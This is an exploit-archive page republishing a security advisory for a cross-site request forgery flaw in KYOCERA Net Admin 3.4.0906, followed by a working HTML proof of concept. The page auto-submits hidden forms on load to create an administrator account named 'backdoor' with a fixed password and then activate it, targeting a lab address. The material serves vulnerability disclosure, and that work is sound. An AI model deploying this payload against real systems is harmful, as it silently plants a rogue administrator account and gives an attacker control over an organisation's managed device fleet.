exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

KYOCERA Net Admin 3.4 Cross Site Request Forgery

KYOCERA Net Admin 3.4 Cross Site Request Forgery
Posted Apr 9, 2018
Authored by LiquidWorm | Site zeroscience.mk

KYOCERA Net Admin version 3.4.0906 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 83f4c903b0fefc6a2f66c607da3fa870a1624b171cf0b08f9977509c00d3d1cd

KYOCERA Net Admin 3.4 Cross Site Request Forgery

Change Mirror Download
<!--


KYOCERA Net Admin 3.4 CSRF Add Admin Exploit


Vendor: KYOCERA Corporation
Product https://global.kyocera.com
Affected version: 3.4.0906

Summary: KYOCERA Net Admin is Kyocera's unified
device management software that uses a web-based
platform to give network administrators easy and
uncomplicated control to handle a fleet for up to
10,000 devices. Tasks that used to require multiple
programs or walking to each printer can now be
accomplished in a single, fast and modern environment.

Desc: The application interface allows users to perform
certain actions via HTTP requests without performing
any validity checks to verify the requests. This can
be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web
site.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
Apache Tomcat/8.5.15


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2018-5458
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5458.php

28.03.2018

-->

<html>
<head>
<title>KYOCERA Net Admin 3.4 CSRF Add Admin Exploit</title>
</head>

<body onload="exploitrun();">

<!-- Add Administrator -->
<form name="create_user" action="https://192.168.18.133:7443/fwk-web/jsp/addUser.faces" method="POST" target="frame0">
<input type="hidden" name="userType" value="0" />
<input type="hidden" name="addUserForm:loginName" value="backdoor" />
<input type="hidden" name="addUserForm:pw" value="pass123" />
<input type="hidden" name="addUserForm:pwConfirm" value="pass123" />
<input type="hidden" name="addUserForm:role" value="administrator" />
<input type="hidden" name="addUserForm:required_name" value="name" />
<input type="hidden" name="addUserForm:required_email1" value="bd@db.ee" />
<input type="hidden" name="addUserForm:required_role" value="administrator" />
<input type="hidden" name="addUserForm:optional_name" value="Backdoor" />
<input type="hidden" name="addUserForm:company" value="ZSL" />
<input type="hidden" name="addUserForm:department" value="forensics" />
<input type="hidden" name="addUserForm:email2" value="bd2@db.ee" />
<input type="hidden" name="addUserForm:optional_phone" value="123-123-1234" />
<input type="hidden" name="addUserForm:optional_cell" value="321-321-3210" />
<input type="hidden" name="addUserForm:submitHidden" value="true" />
<input type="hidden" name="addUserForm_SUBMIT" value="1" />
<input type="hidden" name="addUserForm:_link_hidden_" value="" />
</form>

<!-- Update Node -->
<form name="update_node" action="https://192.168.18.133:7443/fwk-web/servlet/EventControllerServlet" method="GET" target="frame1">
<input type="hidden" name="bname" value="" />
<input type="hidden" name="ts" value="1522690965730" />
<input type="hidden" name="cmd" value="tv_set_cur_node" />
<input type="hidden" name="node_id" value="root.user_administration.administrator.backdoor" />
</form>

<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>

<script>
function exploitrun()
{
document.create_user.submit();
document.getElementsByTagName("iframe")[0].onload = function()
{
document.update_node.submit();
document.getElementsByTagName("iframe")[1].onload = function()
}
}
</script>

</body>
</html>
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    9 Files
  • 7
    Feb 7th
    32 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close